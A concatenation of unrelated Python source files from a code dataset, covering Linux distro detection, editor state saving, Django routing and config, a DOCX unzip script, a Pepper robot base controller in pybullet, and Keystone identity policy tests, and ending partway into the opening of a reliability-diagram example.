    assert system() == "Linux", "Non-Linux platforms are not supported"
    if current_distro is not None:  # The distro is already known
        return
    # Parse the "Operating System" line out of hostnamectl's output.
    current_distro = subprocess.check_output("hostnamectl | grep -E '^Operating System' | sed 's/.*://'", shell = True)
    current_distro = current_distro.decode("utf-8")
    current_distro = current_distro.strip().lower()
    assert len(current_distro) > 0
    # NOTE: Values for current_distro have to be the same as in Packages.csv
    if "ubuntu" in current_distro:
        current_distro = "ubuntu"
    elif "debian" in current_distro:
        current_distro = "debian"
    elif "arch" in current_distro:
        current_distro = "arch"
    elif "fedora" in current_distro:
        current_distro = "fedora"
    else:
        # raise instead of `assert False`, which is silently stripped
        # when Python runs with -O.
        raise AssertionError("Distro not supported")
def grab_package_name(name: str):
    """Print the distro-specific package name for the generic *name*.

    Reads Packages.csv from the current directory, finds the row whose
    'global' column equals *name*, and prints the value of the column
    for the detected distro. Prints nothing when no row matches.
    """
    global current_distro
    determine_distro()
    assert current_distro != None
    with open('Packages.csv', newline='') as packages:
        packages_reader = csv.DictReader(packages)
        for row in packages_reader:
            if str(row['global']) == name:
                # The distro name doubles as the CSV column name.
                distro_package = str(row[current_distro])
                print(distro_package)
                return
current_distro = None
grab_package_name(input())
| StarcoderdataPython |
3326175 | <filename>je_editor/ui/ui_utils/editor_content/content_save.py
import json
import os
from pathlib import Path
from threading import Lock
from je_editor.utils.exception.je_editor_exceptions import JEditorContentFileException
cwd = os.getcwd()
lock = Lock()
editor_data = {
"last_file": None
}
def read_output_content():
    """
    Read the saved editor content JSON from the working directory.

    Returns the raw JSON text, or None when no content file exists yet.
    The module lock serializes access with the writer.
    """
    try:
        lock.acquire()
        file_path = Path(cwd + "/je_editor_content.json")
        if file_path.exists() and file_path.is_file():
            # Open read-only; "r+" needlessly required write permission.
            with open(cwd + "/je_editor_content.json", "r") as read_file:
                return read_file.read()
    except JEditorContentFileException:
        raise JEditorContentFileException
    finally:
        lock.release()
def write_output_content():
    """
    Persist the in-memory `editor_data` dict as JSON.

    Writes je_editor_content.json in the current working directory; the
    module lock serializes access with concurrent readers/writers.
    """
    try:
        lock.acquire()
        with open(cwd + "/je_editor_content.json", "w+") as file_to_write:
            file_to_write.write(json.dumps(editor_data))
    except JEditorContentFileException:
        raise JEditorContentFileException
    finally:
        lock.release()
def save_content_and_quit(file):
    """
    Record *file* as the last opened file and persist the editor content.
    """
    editor_data["last_file"] = file
    write_output_content()
def open_content_and_start():
    """
    Load persisted editor content and return the last opened file path.

    Returns None when no content file has been saved yet.
    """
    temp_content = read_output_content()
    if temp_content is not None:
        editor_data["last_file"] = json.loads(temp_content).get("last_file")
    return editor_data.get("last_file")
| StarcoderdataPython |
1706127 | <filename>src/blog/urls.py
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path, include
from posts.views import index, blog, post, search, category_search, contact, map, ranking
from decouple import config
# URL routing table for the blog project.
urlpatterns = [
    # The admin path is read from the environment so it is not guessable.
    path(config('ADMIN_URL'), admin.site.urls),
    path('', index),
    path('blog/', blog, name='post_list'),
    path('post/<id>', post, name = 'post_detail'),
    path('search/', search, name = 'search'),
    path('category_search/', category_search, name = 'category_search'),
    path('contact/', contact, name='contact'),
    path('map/', map, name="map"),
    path('ranking/', ranking, name="ranking"),
    path('tinymce/', include('tinymce.urls')),
    path('accounts/', include('allauth.urls')),
    # After login, allauth redirects here; reuse the post list view.
    path('accounts/profile/', blog, name='post_list')
]

# Serve static and media files directly only in development.
if settings.DEBUG:
    urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
166148 | <gh_stars>0
# Generated by Django 2.2.10 on 2022-03-22 19:11
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated migration: make Notifications.neighbourhood optional
    # (null/blank allowed) while keeping the cascade delete behaviour.

    dependencies = [
        ('watch', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='notifications',
            name='neighbourhood',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='watch.Neighbourhood'),
        ),
    ]
| StarcoderdataPython |
117923 | """
WSGI config for TeaRoom project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/dev/howto/deployment/wsgi/
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "TeaRoom.settings.production")
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Set OS environmental variable HTTPS to on
os.environ['HTTPS'] = "on"
# os.environ['wsgi.url_scheme'] = 'https'
| StarcoderdataPython |
194356 | #!/usr/bin/env python
# stdlib
import sys, logging, os
from zipfile import ZipFile
# config import path
sys.path.append('/Users/david/dev/docxperiments')
# local modules
from docxperiments.pathutils import mkpath, ls
# set up logger
log_format = 'undx: %(message)s'
logging.basicConfig(level=logging.INFO, format=log_format)
logger = logging.getLogger(__name__)
def decompose(stage_path):
    """Extract <stage>/natural.docx (a zip archive) into <stage>/decomposed."""
    docx_path = mkpath(stage_path, 'natural.docx')
    out_dir = mkpath(stage_path, 'decomposed')
    logger.info("DOCX: '{}'".format(docx_path))
    archive = ZipFile(docx_path)
    logger.info("Decomposed dir: '{}'".format(out_dir))
    archive.extractall(out_dir)
    extracted = ls(out_dir)
    logger.info("Extracted {} files".format(len(extracted)))
    logger.debug("Extracted {} files: {}".format(len(extracted), extracted))
def main():
    """Resolve the stage path from argv (default: cwd) and decompose it."""
    cli_args = sys.argv
    if len(cli_args) == 1:
        stage_path = os.path.realpath(".")
    else:
        stage_path = os.path.realpath(cli_args[1])
    logger.info("Using '{}' for stage path".format(stage_path))
    logger.info("Decomposing '{}'".format(stage_path))
    decompose(stage_path)
main()
| StarcoderdataPython |
75322 | #!/usr/bin/env python
# coding: utf-8
import time
import atexit
import weakref
import pybullet
import threading
from qibullet.tools import *
from qibullet.controller import Controller
class BaseController(Controller):
    """
    Class describing a robot base controller
    """
    # _instances = set()
    # Frames in which a motion goal can be expressed.
    FRAME_WORLD = 1
    FRAME_ROBOT = 2

    def __init__(self, robot_model, physicsClientId=0):
        """
        Constructor

        Parameters:
            robot_model - the pybullet model of the robot
            physicsClientId - The id of the simulated instance in which the
            robot will be controlled
        """
        Controller.__init__(self, robot_model, physicsClientId)
        self.linear_velocity = 0
        self.angular_velocity = 0
        self.linear_acceleration = 0
        self.angular_acceleration = 0
        self.frame = BaseController.FRAME_ROBOT
        self.pose_init = {}
        self.pose_goal = {}

    def _setGoal(self, x, y, theta, frame):
        """
        INTERNAL METHOD, set the position of the goal to a specific frame.

        Parameters:
            x - position of the goal on the x axis, in meters
            y - position of the goal on the y axis, in meters
            theta - orientation of the goal around the z axis, in radians
            frame - The frame in which the goal is expressed: FRAME_WORLD = 1,
            FRAME_ROBOT = 2
        """
        self.goal = [x, y, theta]
        self.frame = frame

    def _updateGoal(self):
        """
        INTERNAL METHOD, update the position of the goal.

        Converts the stored goal into world-frame position/orientation and
        stores the result in self.pose_goal.
        """
        # get actual position in frame world
        actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
            self.robot_model,
            physicsClientId=self.physics_client)
        x, y, theta = self.goal
        # pose x, y, z
        pose_requested = [x, y, 0]
        # orientation requested (euler)
        orn_requested = [0, 0, theta]
        # if we are in frame robot express the position in the frame world:
        # rotate the requested offset by the robot's current yaw, then
        # translate by its current position.
        if self.frame == BaseController.FRAME_ROBOT:
            orn_euler = pybullet.getEulerFromQuaternion(actual_orn)
            pose_requested = [
                pose_requested[0] * math.cos(orn_euler[2])
                - pose_requested[1] * math.sin(orn_euler[2])
                + actual_pos[0],
                pose_requested[0] * math.sin(orn_euler[2])
                + pose_requested[1] * math.cos(orn_euler[2])
                + actual_pos[1],
                0]
            orn_requested = [
                orn_euler[0],
                orn_euler[1],
                orn_euler[2] + theta]
        self.pose_goal["position"] = pose_requested
        self.pose_goal["orientation"] = orn_requested

    def setLinearVelocity(self, linear_velocity):
        """
        Set the linear velocity.

        Parameter:
            linear_velocity : The linear velocity value in m/s
        """
        self.linear_velocity = linear_velocity

    def _setAngularVelocity(self, angular_velocity):
        """
        INTERNAL METHOD, set the angular velocity.

        Parameter:
            angular_velocity : The angular velocity value in rad/s
        """
        self.angular_velocity = angular_velocity

    def _setLinearAcceleration(self, linear_acceleration):
        """
        INTERNAL METHOD, set the linear acceleration.

        Parameter:
            linear_acceleration : The linear acceleration value in m/s^2
        """
        self.linear_acceleration = linear_acceleration

    def _setAngularAcceleration(self, angular_acceleration):
        """
        INTERNAL METHOD, set the angular acceleration.

        Parameter:
            angular_acceleration : The angular acceleration value in rad/s^2
        """
        self.angular_acceleration = angular_acceleration
class PepperBaseController(BaseController):
    """
    Class describing a Pepper base controller
    """
    # Hardware-inspired bounds used to clamp requested speeds/accelerations.
    MAX_LINEAR_VELOCITY = 0.55
    MIN_LINEAR_VELOCITY = 0.1
    MAX_ANGULAR_VELOCITY = 2.0
    MIN_ANGULAR_VELOCITY = 0.3
    MAX_LINEAR_ACCELERATION = 0.55
    MIN_LINEAR_ACCELERATION = 0.1
    MAX_ANGULAR_ACCELERATION = 3.0
    MIN_ANGULAR_ACCELERATION = 0.1

    def __init__(
            self,
            robot_model,
            speed,
            acceleration,
            motion_constraint,
            physicsClientId=0):
        """
        Constructor

        Parameters:
            robot_model - the pybullet model of the robot
            speed - list containing the linear velocity and the angular
            velocity values, in m/s
            acceleration - list containing the linear acceleration and angular
            acceleration values, in m/s^2
            motion_constraint - the pybullet motion constraint applied on the
            robot
            physicsClientId - The id of the simulated instance in which Pepper
            will be controlled
        """
        BaseController.__init__(
            self,
            robot_model,
            physicsClientId=physicsClientId)
        # Set the different speeds and accelerations
        self.setLinearVelocity(speed[0])
        self._setAngularVelocity(speed[1])
        self._setLinearAcceleration(acceleration[0])
        self._setAngularAcceleration(acceleration[1])
        # force applied in the movement
        self.force = 100
        # The robot will stop the movement with a precision of 0.01 m and 0.02
        # rads
        self.linear_threshold = 0.01
        self.angular_threshold = 0.02
        self.motion_constraint = motion_constraint

    def setLinearVelocity(self, linear_velocity):
        """
        Set the linear velocity, clamped to [MIN, MAX]_LINEAR_VELOCITY.

        Parameter:
            linear_velocity : The linear velocity value in m/s
        """
        if linear_velocity > PepperBaseController.MAX_LINEAR_VELOCITY:
            linear_velocity = PepperBaseController.MAX_LINEAR_VELOCITY
        elif linear_velocity < PepperBaseController.MIN_LINEAR_VELOCITY:
            linear_velocity = PepperBaseController.MIN_LINEAR_VELOCITY
        BaseController.setLinearVelocity(self, linear_velocity)

    def _setAngularVelocity(self, angular_velocity):
        """
        INTERNAL METHOD, set the angular velocity, clamped to
        [MIN, MAX]_ANGULAR_VELOCITY.

        Parameter:
            angular_velocity : The angular velocity value in rad/s
        """
        if angular_velocity > PepperBaseController.MAX_ANGULAR_VELOCITY:
            angular_velocity = PepperBaseController.MAX_ANGULAR_VELOCITY
        elif angular_velocity < PepperBaseController.MIN_ANGULAR_VELOCITY:
            angular_velocity = PepperBaseController.MIN_ANGULAR_VELOCITY
        BaseController._setAngularVelocity(self, angular_velocity)

    def _setLinearAcceleration(self, linear_acceleration):
        """
        INTERNAL METHOD, set the linear acceleration, clamped to
        [MIN, MAX]_LINEAR_ACCELERATION.

        Parameter:
            linear_acceleration : The linear acceleration value in m/s^2
        """
        if linear_acceleration > PepperBaseController.MAX_LINEAR_ACCELERATION:
            linear_acceleration = PepperBaseController.MAX_LINEAR_ACCELERATION
        elif linear_acceleration <\
                PepperBaseController.MIN_LINEAR_ACCELERATION:
            linear_acceleration = PepperBaseController.MIN_LINEAR_ACCELERATION
        BaseController._setLinearAcceleration(self, linear_acceleration)

    def _setAngularAcceleration(self, angular_acceleration):
        """
        INTERNAL METHOD, set the angular acceleration, clamped to
        [MIN, MAX]_ANGULAR_ACCELERATION.

        Parameter:
            angular_acceleration : The angular acceleration value in rad/s^2
        """
        if angular_acceleration >\
                PepperBaseController.MAX_ANGULAR_ACCELERATION:
            angular_acceleration =\
                PepperBaseController.MAX_ANGULAR_ACCELERATION
        elif angular_acceleration <\
                PepperBaseController.MIN_ANGULAR_ACCELERATION:
            angular_acceleration =\
                PepperBaseController.MIN_ANGULAR_ACCELERATION
        BaseController._setAngularAcceleration(self, angular_acceleration)

    def moveTo(self, x, y, theta, frame, _async=False):
        """
        Move the robot in frame world or robot (FRAME_WORLD=1, FRAME_ROBOT=2).
        This method can be called synchonously or asynchronously. In the
        asynchronous mode, the function can be called when it's already
        launched, this will update the goal of the motion.

        Parameters:
            x - position of the goal on the x axis, in meters
            y - position of the goal on the y axis, in meters
            theta - orientation of the goal around the z axis, in radians
            frame - The frame in which the goal is expressed: FRAME_WORLD = 1,
            FRAME_ROBOT = 2
            _async - The method is launched in async mode if True, in synch
            mode if False (False by default)
        """
        self._setGoal(x, y, theta, frame)
        # NOTE(review): Thread.isAlive() was removed in Python 3.9 — should
        # be is_alive(); confirm the targeted Python version.
        if self.module_process.isAlive():
            if _async is False:
                raise pybullet.error(
                    "Already a moveTo asynchronous. Can't "
                    "launch moveTo synchronous")
            # A moveTo is already running: just retarget it.
            self._initProcess()
        elif _async:
            self.module_process = threading.Thread(target=self._moveToProcess)
            self.module_process.start()
        else:
            self._moveToProcess()

    def move(self, x, y, theta):
        """
        Apply a speed on the robot's base.

        Parameters:
            x - Speed on the x axis, in m/s
            y - Speed on the y axis, in m/s
            theta - Rotational speed around the z axis, in rad/s
        """
        # Kill any previous moveTo process running
        self.moveTo(0, 0, 0, frame=BaseController.FRAME_ROBOT, _async=True)
        # Bound the velocity. The max acceleration is not taken into account
        # here, this is a potential improvment
        if abs(x) > PepperBaseController.MAX_LINEAR_VELOCITY:
            x = PepperBaseController.MAX_LINEAR_VELOCITY * (x/abs(x))
        if abs(y) > PepperBaseController.MAX_LINEAR_VELOCITY:
            y = PepperBaseController.MAX_LINEAR_VELOCITY * (y/abs(y))
        if abs(theta) > PepperBaseController.MAX_ANGULAR_VELOCITY:
            theta = PepperBaseController.MAX_ANGULAR_VELOCITY *\
                (theta/abs(theta))
        actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
            self.robot_model,
            physicsClientId=self.physics_client)
        # convert actual_orn into euler
        actual_orn = pybullet.getEulerFromQuaternion(actual_orn)
        # Rotate the robot-frame speed by the current yaw to get a
        # world-frame velocity vector.
        linear_world_velocity = [
            x * math.cos(actual_orn[2]) - y * math.sin(actual_orn[2]),
            x * math.sin(actual_orn[2]) + y * math.cos(actual_orn[2]),
            0]
        # presumably gives the previous moveTo thread time to stop —
        # TODO confirm why this fixed delay is needed.
        time.sleep(0.02)
        pybullet.resetBaseVelocity(
            self.robot_model,
            linear_world_velocity,
            [0, 0, theta],
            physicsClientId=self.physics_client)

    def stopMove(self):
        """
        If an aynchronous moveTo has been launched, calling this method will
        stop the asynchronous process. Calling this method is equivalent to
        calling moveTo(0.0, 0.0, 0.0, BaseController.FRAME_ROBOT, _async=True)
        """
        self.moveTo(0.0, 0.0, 0.0, BaseController.FRAME_ROBOT, _async=True)

    def _updateConstraint(self):
        """
        INTERNAL METHOD, update the robot's constraint.
        """
        # Change the constraint to the requested position and orientation
        pybullet.changeConstraint(
            self.motion_constraint,
            self.pose_goal["position"],
            jointChildFrameOrientation=pybullet.getQuaternionFromEuler(
                self.pose_goal["orientation"]),
            maxForce=self.force,
            physicsClientId=self.physics_client)

    def _initProcess(self):
        """
        INTERNAL METHOD, initialize the motion process and all variables
        needed.
        """
        # Get actual position in frame world
        self.pose_init["position"], self.pose_init["orientation"] =\
            pybullet.getBasePositionAndOrientation(
                self.robot_model,
                physicsClientId=self.physics_client)
        # convert pose_init orientation in orn_euler
        self.pose_init["orientation"] = pybullet.getEulerFromQuaternion(
            self.pose_init["orientation"]
        )
        self._updateGoal()
        self._updateConstraint()
        # Compute the ratio distance requested on the total distance
        distance = getDistance(
            self.pose_init["position"],
            self.pose_goal["position"])
        # p_x/p_y form the unit direction of travel, p_theta the sign of
        # the rotation; all stay 0 when there is nothing to do.
        self.p_x = 0
        self.p_y = 0
        self.p_theta = 0
        if distance:
            self.p_x = (
                self.pose_goal["position"][0] -
                self.pose_init["position"][0]) / distance
            self.p_y = (
                self.pose_goal["position"][1] -
                self.pose_init["position"][1]) / distance
        theta_to_do = getOrientation(
            self.pose_init["orientation"],
            self.pose_goal["orientation"])
        if abs(theta_to_do):
            self.p_theta = abs(theta_to_do) / theta_to_do

    def _endProcess(self):
        """
        INTERNAL METHOD, stop the robot movement.
        """
        # Change the constraint to the actual position and orientation in
        # order to stop the robot's motion. The force applied is purposely huge
        # to avoid oscillations.
        actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
            self.robot_model,
            physicsClientId=self.physics_client)
        pybullet.changeConstraint(
            self.motion_constraint,
            actual_pos,
            jointChildFrameOrientation=actual_orn,
            maxForce=self.force * 10,
            physicsClientId=self.physics_client)
        pybullet.resetBaseVelocity(
            self.robot_model,
            [0, 0, 0],
            [0, 0, 0],
            physicsClientId=self.physics_client)

    def _moveToProcess(self):
        """
        INTERNAL METHOD, process allowing to move the robot's base.

        Loops until the base is within the linear/angular thresholds of the
        goal (or the module is terminated), updating the base velocity at
        each iteration.
        """
        self._initProcess()
        # actual_pos = self.pose_init["position"]
        # actual_orn = self.pose_init["orientation"]
        init_pos = self.pose_init["position"]
        init_orn = self.pose_init["orientation"]
        actual_pos = init_pos
        actual_orn = init_orn
        while not self._module_termination:
            translation_distance = getDistance(
                actual_pos,
                self.pose_goal["position"])
            # Modulo the orientation pose goal with conversion in quaternion
            modulo_quater_pose_goal = pybullet.getQuaternionFromEuler(
                self.pose_goal["orientation"])
            # Conversion into euler
            modulo_euler_pose_goal = pybullet.getEulerFromQuaternion(
                modulo_quater_pose_goal)
            rotation_distance = abs(getOrientation(
                actual_orn,
                modulo_euler_pose_goal))
            # Stop once both the position and orientation are close enough.
            if translation_distance < self.linear_threshold and\
                    rotation_distance < self.angular_threshold:
                break
            actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
                self.robot_model,
                physicsClientId=self.physics_client)
            # convert actual_orn into euler
            actual_orn = pybullet.getEulerFromQuaternion(actual_orn)
            linear_vel_x = computeVelocity(
                self.linear_acceleration,
                0.05,
                self.linear_velocity,
                getDistance(actual_pos, init_pos),
                getDistance(actual_pos, self.pose_goal["position"]))
            linear_vel_y = linear_vel_x
            angular_vel = computeVelocity(
                self.angular_acceleration,
                0.05,
                self.angular_velocity,
                abs(getOrientation(
                    init_orn,
                    actual_orn)),
                abs(getOrientation(
                    actual_orn,
                    self.pose_goal["orientation"])))
            # If the robot is on the requested position, we set the velocity to
            # 0.
            if abs(actual_pos[0] - self.pose_goal["position"][0]) <=\
                    self.linear_threshold / 2:
                linear_vel_x = 0
            if abs(actual_pos[1] - self.pose_goal["position"][1]) <=\
                    self.linear_threshold / 2:
                linear_vel_y = 0
            if abs(getOrientation(
                    actual_orn, self.pose_goal["orientation"])) <=\
                    self.angular_threshold:
                angular_vel = 0
            # Reset the velocity of the robot
            time.sleep(0.02)
            pybullet.resetBaseVelocity(
                self.robot_model,
                [linear_vel_x * self.p_x, linear_vel_y * self.p_y, 0],
                [0, 0, angular_vel * self.p_theta],
                physicsClientId=self.physics_client)
        self._endProcess()
| StarcoderdataPython |
3307919 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import tempfile
import uuid

from keystone import config
from keystone import exception
from keystone.openstack.common import jsonutils
from keystone.policy.backends import rules

import test_v3
CONF = config.CONF
DEFAULT_DOMAIN_ID = CONF.identity.default_domain_id
class IdentityTestProtectedCase(test_v3.RestfulTestCase):
    """Test policy enforcement on the v3 Identity API."""

    def setUp(self):
        """Setup for Identity Protection Test Cases.

        As well as the usual housekeeping, create a set of domains,
        users, roles and projects for the subsequent tests:

        - Three domains: A, B & C.  C is disabled.
        - DomainA has user1, DomainB has user2 and user3
        - DomainA has group1 and group2, DomainB has group3
        - User1 has a role on DomainA

        Remember that there will also be a fourth domain in existence,
        the default domain.

        """
        # Ensure that test_v3.RestfulTestCase doesn't load its own
        # sample data, which would make checking the results of our
        # tests harder
        super(IdentityTestProtectedCase, self).setUp(load_sample_data=False)

        # Start by creating a couple of domains
        self.domainA = self.new_domain_ref()
        self.identity_api.create_domain(self.domainA['id'], self.domainA)
        self.domainB = self.new_domain_ref()
        self.identity_api.create_domain(self.domainB['id'], self.domainB)
        self.domainC = self.new_domain_ref()
        self.domainC['enabled'] = False
        self.identity_api.create_domain(self.domainC['id'], self.domainC)

        # Now create some users, one in domainA and two of them in domainB
        self.user1 = self.new_user_ref(domain_id=self.domainA['id'])
        self.user1['password'] = uuid.uuid4().hex
        self.identity_api.create_user(self.user1['id'], self.user1)
        self.user2 = self.new_user_ref(domain_id=self.domainB['id'])
        self.user2['password'] = uuid.uuid4().hex
        self.identity_api.create_user(self.user2['id'], self.user2)
        self.user3 = self.new_user_ref(domain_id=self.domainB['id'])
        # Fixed a corrupted statement here: user3 gets a fresh random
        # password just like user1 and user2.
        self.user3['password'] = uuid.uuid4().hex
        self.identity_api.create_user(self.user3['id'], self.user3)

        self.group1 = self.new_group_ref(domain_id=self.domainA['id'])
        self.identity_api.create_group(self.group1['id'], self.group1)
        self.group2 = self.new_group_ref(domain_id=self.domainA['id'])
        self.identity_api.create_group(self.group2['id'], self.group2)
        self.group3 = self.new_group_ref(domain_id=self.domainB['id'])
        self.identity_api.create_group(self.group3['id'], self.group3)

        self.role = self.new_role_ref()
        self.identity_api.create_role(self.role['id'], self.role)
        self.identity_api.create_grant(self.role['id'],
                                       user_id=self.user1['id'],
                                       domain_id=self.domainA['id'])

        # Initialize the policy engine and allow us to write to a temp
        # file in each test to create the policies
        self.orig_policy_file = CONF.policy_file
        rules.reset()
        # mkstemp() returns an *open* OS-level file descriptor along with the
        # name; close it immediately so it is not leaked -- the tests only
        # ever reopen the file by name in _set_policy().
        fd, self.tmpfilename = tempfile.mkstemp()
        os.close(fd)
        self.opt(policy_file=self.tmpfilename)

        # A default auth request we can use - un-scoped user token
        self.auth = self.build_authentication_request(
            user_id=self.user1['id'],
            password=self.user1['password'])

    def tearDown(self):
        """Restore the original policy engine configuration."""
        super(IdentityTestProtectedCase, self).tearDown()
        rules.reset()
        self.opt(policy_file=self.orig_policy_file)

    def _get_id_list_from_ref_list(self, ref_list):
        """Collect just the 'id' values from a list of entity references."""
        result_list = []
        for x in ref_list:
            result_list.append(x['id'])
        return result_list

    def _set_policy(self, new_policy):
        """Overwrite the temporary policy file with ``new_policy`` as JSON."""
        with open(self.tmpfilename, "w") as policyfile:
            policyfile.write(jsonutils.dumps(new_policy))

    def test_list_users_unprotected(self):
        """GET /users (unprotected)

        Test Plan:

        - Update policy so api is unprotected
        - Use an un-scoped token to make sure we can get back all
          the users independent of domain

        """
        self._set_policy({"identity:list_users": []})
        r = self.get('/users', auth=self.auth)
        id_list = self._get_id_list_from_ref_list(r.result.get('users'))
        self.assertIn(self.user1['id'], id_list)
        self.assertIn(self.user2['id'], id_list)
        self.assertIn(self.user3['id'], id_list)

    def test_list_users_filtered_by_domain(self):
        """GET /users?domain_id=mydomain (filtered)

        Test Plan:

        - Update policy so api is unprotected
        - Use an un-scoped token to make sure we can filter the
          users by domainB, getting back the 2 users in that domain

        """
        self._set_policy({"identity:list_users": []})
        url_by_name = '/users?domain_id=%s' % self.domainB['id']
        r = self.get(url_by_name, auth=self.auth)
        # We should get back two users, those in DomainB
        id_list = self._get_id_list_from_ref_list(r.result.get('users'))
        self.assertIn(self.user2['id'], id_list)
        self.assertIn(self.user3['id'], id_list)

    def test_get_user_protected_match_id(self):
        """GET /users/{id} (match payload)

        Test Plan:

        - Update policy to protect api by user_id
        - List users with user_id of user1 as filter, to check that
          this will correctly match user_id in the flattened
          payload

        """
        # TODO(henry-nash, ayoung): It would be good to expand this
        # test for further test flattening, e.g. protect on, say, an
        # attribute of an object being created
        new_policy = {"identity:get_user": [["user_id:%(user_id)s"]]}
        self._set_policy(new_policy)
        url_by_name = '/users/%s' % self.user1['id']
        r = self.get(url_by_name, auth=self.auth)
        # assertEqual (not the deprecated assertEquals) for consistency with
        # the other tests in this class.
        self.assertEqual(self.user1['id'], r.result['user']['id'])

    def test_list_users_protected_by_domain(self):
        """GET /users?domain_id=mydomain (protected)

        Test Plan:

        - Update policy to protect api by domain_id
        - List groups using a token scoped to domainA with a filter
          specifying domainA - we should only get back the one user
          that is in domainA.
        - Try and read the users from domainB - this should fail since
          we don't have a token scoped for domainB

        """
        new_policy = {"identity:list_users": ["domain_id:%(domain_id)s"]}
        self._set_policy(new_policy)
        self.auth = self.build_authentication_request(
            user_id=self.user1['id'],
            password=self.user1['password'],
            domain_id=self.domainA['id'])
        url_by_name = '/users?domain_id=%s' % self.domainA['id']
        r = self.get(url_by_name, auth=self.auth)
        # We should only get back one user, the one in DomainA
        id_list = self._get_id_list_from_ref_list(r.result.get('users'))
        self.assertEqual(len(id_list), 1)
        self.assertIn(self.user1['id'], id_list)
        # Now try for domainB, which should fail
        url_by_name = '/users?domain_id=%s' % self.domainB['id']
        self.get(url_by_name, auth=self.auth,
                 expected_status=exception.ForbiddenAction.code)

    def test_list_groups_protected_by_domain(self):
        """GET /groups?domain_id=mydomain (protected)

        Test Plan:

        - Update policy to protect api by domain_id
        - List groups using a token scoped to domainA and make sure
          we only get back the two groups that are in domainA
        - Try and read the groups from domainB - this should fail since
          we don't have a token scoped for domainB

        """
        new_policy = {"identity:list_groups": ["domain_id:%(domain_id)s"]}
        self._set_policy(new_policy)
        # Fixed a corrupted token here: authenticate as user1, whose id is
        # used on the line above.
        self.auth = self.build_authentication_request(
            user_id=self.user1['id'],
            password=self.user1['password'],
            domain_id=self.domainA['id'])
        url_by_name = '/groups?domain_id=%s' % self.domainA['id']
        r = self.get(url_by_name, auth=self.auth)
        # We should only get back two groups, the ones in DomainA
        id_list = self._get_id_list_from_ref_list(r.result.get('groups'))
        self.assertEqual(len(id_list), 2)
        self.assertIn(self.group1['id'], id_list)
        self.assertIn(self.group2['id'], id_list)
        # Now try for domainB, which should fail
        url_by_name = '/groups?domain_id=%s' % self.domainB['id']
        self.get(url_by_name, auth=self.auth,
                 expected_status=exception.ForbiddenAction.code)

    def test_list_groups_protected_by_domain_and_filtered(self):
        """GET /groups?domain_id=mydomain&name=myname (protected)

        Test Plan:

        - Update policy to protect api by domain_id
        - List groups using a token scoped to domainA with a filter
          specifying both domainA and the name of group.
        - We should only get back the group in domainA that matches
          the name

        """
        new_policy = {"identity:list_groups": ["domain_id:%(domain_id)s"]}
        self._set_policy(new_policy)
        # Fixed a corrupted token here as well: authenticate as user1.
        self.auth = self.build_authentication_request(
            user_id=self.user1['id'],
            password=self.user1['password'],
            domain_id=self.domainA['id'])
        url_by_name = '/groups?domain_id=%s&name=%s' % (
            self.domainA['id'], self.group2['name'])
        r = self.get(url_by_name, auth=self.auth)
        # We should only get back one user, the one in DomainA that matches
        # the name supplied
        id_list = self._get_id_list_from_ref_list(r.result.get('groups'))
        self.assertEqual(len(id_list), 1)
        self.assertIn(self.group2['id'], id_list)

    def test_list_filtered_domains(self):
        """GET /domains?enabled=0

        Test Plan:

        - Update policy for no protection on api
        - Filter by the 'enabled' boolean to get disabled domains, which
          should return just domainC
        - Try the filter using different ways of specifying 'true'
          to test that our handling of booleans in filter matching is
          correct

        """
        new_policy = {"identity:list_domains": []}
        self._set_policy(new_policy)
        r = self.get('/domains?enabled=0', auth=self.auth)
        id_list = self._get_id_list_from_ref_list(r.result.get('domains'))
        self.assertEqual(len(id_list), 1)
        self.assertIn(self.domainC['id'], id_list)
        # Now try a few ways of specifying 'true' when we should get back
        # the other two domains, plus the default domain
        r = self.get('/domains?enabled=1', auth=self.auth)
        id_list = self._get_id_list_from_ref_list(r.result.get('domains'))
        self.assertEqual(len(id_list), 3)
        self.assertIn(self.domainA['id'], id_list)
        self.assertIn(self.domainB['id'], id_list)
        self.assertIn(DEFAULT_DOMAIN_ID, id_list)
        r = self.get('/domains?enabled', auth=self.auth)
        id_list = self._get_id_list_from_ref_list(r.result.get('domains'))
        self.assertEqual(len(id_list), 3)
        self.assertIn(self.domainA['id'], id_list)
        self.assertIn(self.domainB['id'], id_list)
        self.assertIn(DEFAULT_DOMAIN_ID, id_list)

    def test_multiple_filters(self):
        """GET /domains?enabled&name=myname

        Test Plan:

        - Update policy for no protection on api
        - Filter by the 'enabled' boolean and name - this should
          return a single domain

        """
        new_policy = {"identity:list_domains": []}
        self._set_policy(new_policy)
        # Fixed a typo here: the query parameter is 'enabled', not
        # 'enableds' (matching the docstring and test_list_filtered_domains).
        my_url = '/domains?enabled&name=%s' % self.domainA['name']
        r = self.get(my_url, auth=self.auth)
        id_list = self._get_id_list_from_ref_list(r.result.get('domains'))
        self.assertEqual(len(id_list), 1)
        self.assertIn(self.domainA['id'], id_list)
| StarcoderdataPython |
1725653 | """
=============================
Plotting reliability diagrams
=============================
This example illustrates how to visualise the reliability diagram for a binary
probabilistic classifier.
"""
# Author: <NAME> <<EMAIL>>
# License: new BSD
print(__doc__)
##############################################################################
# This example shows different ways to visualise the reliability diagram for a
# binary classification problem.
#
# First we will generate two synthetic models and some synthetic scores and
# labels.
import matplotlib.pyplot as plt
